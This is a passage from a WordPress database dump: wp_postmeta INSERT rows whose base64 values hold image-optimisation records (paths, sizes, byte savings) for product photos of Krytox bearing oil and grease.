jIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTE0LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xNC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NzgyNywiaWQiOjEwNDB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xNC0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMTQtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTE0LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc3ODMwLCJpZCI6MTA0MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTE0LTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xNC01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMTQtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Nzc4MzMsImlkIjoxMDQwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xNC0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMTQtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTE0LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxNzYsInRpbWUiOjE0ODM1Nzc4MzUsImlkIjoxMDQwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xNC0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMTQtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTE0LTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjo2MCwidGltZSI6MTQ4MzU3NzgzOCwiaWQiOjEwNDB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTE0LTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xNC0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMTQtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjIxLCJ0aW1lIjoxNDgzNTc3ODQwLCJpZCI6MTA0MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMTQtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTE0LTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xNC0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3Nzg0MywiaWQiOjEwNDB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTE0LTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xNC0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMTQtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Nzc4NDUsImlkIjoxMDQwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xNC00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMTQtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTE0LTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc3ODQ4LCJpZCI6MTA0MH1d'); 
INSERT INTO `wp_postmeta` VALUES (29818, 1039, 'wpfc_optimisation_reduction', '16511'); 
INSERT INTO `wp_postmeta` VALUES (29819, 1039, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xMy5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMTMuanBnIiwid2lkdGgiOjUwMDAsImhlaWdodCI6NTAwMCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU3Nzg1MywiaWQiOiIxMDM5In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTEzLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xMy0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMTMtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjc2NywidGltZSI6MTQ4MzU3Nzg1NywiaWQiOjEwMzl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xMy04MDB4ODAwLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6ODAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMTMtODAweDgwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTEzLTgwMHg4MDAuanBnIiwicmVkdWN0aW9uIjoxNTg1LCJ0aW1lIjoxNDgzNTc3ODYxLCJpZCI6MTAzOX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTEzLTc2OHg3NjguanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo3NjgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xMy03Njh4NzY4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMTMtNzY4eDc2OC5qcGciLCJyZWR1Y3Rpb24iOjE1NjAsInRpbWUiOjE0ODM1Nzc4NjUsImlkIjoxMDM5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMTMtMTYwMHgxNjAwLmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjE2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xMy0xNjAweDE2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xMy0xNjAweDE2MDAuanBnIiwicmVkdWN0aW9uIjo0NzcxLCJ0aW1lIjoxNDgzNTc3ODcwLCJpZCI6MTAzOX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTEzLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xMy0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMTMtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjYyNywidGltZSI6MTQ4MzU3Nzg3MywiaWQiOjEwMzl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xMy0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMTMtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTEzLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo1NDEsInRpbWUiOjE0ODM1Nzc4NzcsImlkIjoxMDM5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMTMtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTEzLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xMy0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NTY5LCJ0aW1lIjoxNDgzNTc3ODgwLCJpZCI6MTAzOX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTEzLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xMy01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMTMtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEwNzcsInRpbWUiOjE0ODM1Nzc4ODQsImlkIjoxMDM5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xMy0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMTMtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTEzLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo1NDgsInRpbWUiOjE0ODM1Nzc4ODcsImlkIjoxMDM5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xMy0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMTMtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTEzLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjo1NzAsInRpbWUiOjE0ODM1Nzc4OTEsImlkIjoxMDM5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xMy0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMTMtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTEzLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjo2NjEsInRpbWUiOjE0ODM1Nzc4OTQsImlkIjoxMDM5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xMy0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMTMtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTEzLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjo5NzIsInRpbWUiOjE0ODM1Nzc4OTgsImlkIjoxMDM5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xMy0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMTMtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTEzLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxMDI1LCJ0aW1lIjoxNDgzNTc3OTAxLCJpZCI6MTAzOX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMTMtNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTEzLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xMy00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MTIzOCwidGltZSI6MTQ4MzU3NzkwNSwiaWQiOjEwMzl9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29820, 1038, 'wpfc_optimisation_reduction', '12610'); 
INSERT INTO `wp_postmeta` VALUES (29821, 1038, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xMi5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMTIuanBnIiwid2lkdGgiOjU3NjAsImhlaWdodCI6Mzg0MCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU3NzkxMCwiaWQiOiIxMDM4In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTEyLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xMi0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYW